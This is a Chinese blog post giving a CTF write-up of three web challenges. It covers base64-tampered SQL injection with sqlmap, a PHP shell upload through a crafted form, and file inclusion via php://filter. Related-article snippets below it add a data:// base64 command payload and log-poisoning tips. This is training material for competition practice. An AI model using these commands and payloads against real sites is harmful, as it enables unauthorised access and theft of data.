CTF考核writeup(1)

最新推荐文章于 2024-09-25 20:24:17 发布
最新推荐文章于 2024-09-25 20:24:17 发布
阅读量4.2k 收藏
点赞数
分类专栏: 安全 文章标签: sql注入 文件上传 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_am_going/article/details/53287083
版权

在sql注入、文件上传和文件包含问题上,可以学到一些新思路。

sql注入

观察题目链接,很明显,存在注入的是id。于是利用sqlmap验证,但sqlmap的结果却是“not injectble”:

注意到链接中id值是‘MQ==’。明显参数是经过base64编码的,解码后值为‘1’。

sqlmap中内置了base64编码脚本:

sqlmap -u “http://xxx/index.php?id=1” - -tamper base64encode.py - -current-db

发现确实是存在注入的。

接下来用sqlmap,按套路猜解,即可在flag表中找到flag。

选择一个数据库猜表
sqlmap.py -u "--" -D demo --tables
选择一个表猜列
sqlmap.py -u "--" -D demo -T flag --columns
根据列猜数据
sqlmap.py -u "--" -D demo -T flag -C value --dump

关键在于参数被base64编码。tamper目录中各种脚本还是很多的。

文件上传

查看题目,没有找到上传点。

扫了一下目录,发现/upload,看这目录名,一会儿上传的话应该是要传到这个目录下的。

首先想到是不是可以用PUT+COPY,尝试后发现被禁了。

OPTIONS / HTTP/1.1 
User-Agent: xxxx
Host: xxxx
Accept: */*
PUT /test.txt HTTP/1.1
User-Agent: xxxx
Host: xxxx
Accept: */*

既然没有上传点,于是自行构造一个form表单。将action指向upload.php。这里还得要猜对name的值为file。再尝试从本地表单上传jpg文件,提交成功,表明此处确实有上传功能。这时会发现一个问题,不知道文件被传到哪儿了。所以在表单中添加一个隐藏域,将“dir”指定为“/upload/”。

<form action="http://--/upload.php" method="post" enctype= "multipart/form-data">
  <input type="file" name="file" /></p>
  <input type="hidden" name="dir" value="/upload/">
  <input type="submit"/>
</form>

再次上传jpg文件,成功上传到/upload目录下。接下来开始考虑上传phpshell。

尝试00截断,失败。后来发现内容为空的时候直接上传php文件竟然成功了。

访问,即可回显flag。

文件包含

首先尝试能否读上级目录,发现./被过滤为malicious parameter,而/../没有被过滤,所以检测的只是开头有没有.。

这种情况下,利用php伪协议filter,成功包含文件,读取flag。

php://filter/resource=../flag

离离原上草_#
关注
专栏目录
【N1CTF】Oflo WriteUp
古月浪子的博客
10-22 603
二进制文件里面有很多call+e8+jmp+[return address += 1]这种操作,导致IDA无法处理,直接F5出来的几乎不能看,索性手动nop一下 对sub_400A69前10个字节进行动态patch,异或的内容是输入的前5个字符,根据flag的格式,猜测是n1ctfIDAPython脚本: a='n1ctf' for i in range(10): PatchByte(0x400a69+i,Byte(0x400a69+i)^ord(a[i%5])) 跑完脚本以后可以正常F5该函
文件包含ctf
qq_42812036的博客
10-14 2871
文件包含定义危险函数ctf文件包含PHP伪协议php://inputphp://filterdata://phar://zip://常见的敏感文件Windows 服务器敏感文件linux 服务器敏感文件 定义 在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外恩德文件,导致意外的文件泄露甚至恶意代码的注入。 严格来说文件包含算是代码注入的一种 危险函数 in...
网络安全CTF ——web_文件包含
weixin_63274653的博客
01-27 547
通过查看php.ini文件,发现allow_url_fopen 和 allow_url_include都是打开的,所以可以判断是远程文件包含。这里URL的意思是:读取index.php的内容,并把输入流进行base64编码,不进行base64编码就如法读取源码,就看不到flag。指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件。直接读取目标机上的Flag文件,通常可以通过操纵变量去读取。文件包含类型分为两种,一种是本地文件包含,另一种是远程文件包含。通过给定的URL查看源码。
文件上传漏洞+CTF实例
最新发布
hyq99999的博客
09-25 950
文件上传漏洞
文件包含(CTF)
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
CTF文件包含
qq_45086218的博客
02-28 3301
文章目录php伪协议data伪协议日志文件session文件竞争死亡绕过base64编码绕过 本文以ctf.show网站题目为例,总结ctf中的文件包含漏洞 php伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php data伪协议 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxh
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
本文主要涉及的是网络安全领域中的CTF(Capture The Flag)竞赛,特别是Web安全相关的挑战。在2018年的第二届强网杯线上赛中,存在一系列难度较大的Web题目,这些题目主要测试参赛者的Web安全技能,包括但不限于密码...
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
CTF-writeup
03-19
在这个CTF-writeup中,我们将主要探讨与JavaScript相关的知识点,这是一种广泛用于Web开发的编程语言,也是CTF比赛中的常见挑战类型。 JavaScript是互联网上动态内容的基础,它允许网页与用户进行交互,执行实时...
阿里云ctf比赛writeup
04-26
阿里云CTF比赛Writeup详解 在网络安全领域,Capture The Flag(CTF)是一种常见的竞赛形式,参赛者通过解决各种安全挑战来展示他们的技术能力。阿里云CTF比赛提供了多种类型的挑战,包括Web、Misc、Pwn、Reverse和...
CTF考核writeup(2)
一段旅途
11-23 2302
没有什么,保存下来。主要有xss csrf 绕过 上传的内容。
CTF—文件
YkingH的博客
07-08 991
CTF文件包含 文件包含漏洞 定义:在通过php函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入 危险函数 include() include_once() require() require_once() 解题思路 本地文件包含:直接读取目标机上的Flag文件 远程文件包含:指定第三方服务器上可运行的PHP木马,拿到webshell,查看flag文件 php.ini allow_url_fopen = on/off 允许ur
CTF-文件包含(持续更新)
m0_74317362的博客
07-28 1620
任意文件包含漏洞处理方法和实例
CTF之web学习记录 -- 文件包含
热门推荐
lifanxin的博客
05-11 1万+
文件包含概述常见文件包含函数和原理本地文件包含远程文件包含总结 概述   后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,因此该过程也就被称为文件包含文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。 常见文件包含函数和原理 # php include() // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行 require() // 程序运行就
文件包含ctfhub
weixin_43326436的博客
08-06 859
1.进入以后,发现的是 应该可以看到是一段代码,strpos这个函数就是查找相同字符串的位置,在这里就是查找和flag相同的字符串的位置,在下面又发现了一个我又一个链接是shell.txt,怎么使用它吗。点进去链接又是一句php,请求ctfhub意思。 2.因为是文件包含,所以直接构造payload 将?shell.txt构造, 所以直接 看到这个图片,利用火狐中的hackbar postdata 输入 ctfhub=system(‘cat /flag’); (system意思就是输出并返回最后一个sh
CTF-文件包含学习
weixin_44770698的博客
05-30 2301
CTFSHOW WEB-17 通过请求包查看到服务器为nginx,然后尝试查看一下/etc/passwd文件。 访问成功说明可以访问内网文件,然后尝试读取日志文件中的信息。nginx的日志文件为/var/log/nginx/access.log 发现日志文件中记录了UA,所以在数据包中写入系统执行命令,所以当我们在UA中写入系统执行命令的时候,再去包含,会当做php来执行。 发现存在着indes.php 和36d.php两个文件,查看36d.php文件中的内容。 WEB-18
ctf文件包含漏洞(一)
wlllllianqing的博客
10-06 2304
文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数: include() include_once() require() require_once() (未完持续…) ...
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 791
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1084
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTF理论考核精选题与答案解析
本资源是一份CTF理论考核题库,涵盖了多个与网络安全、Web开发、操作系统、网络协议和数据库管理相关的内容。以下是一些重要的知识点总结: 1. **文件扩展名识别** - 在`readme.txt`文件中,文件扩展名是`.txt`,它...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值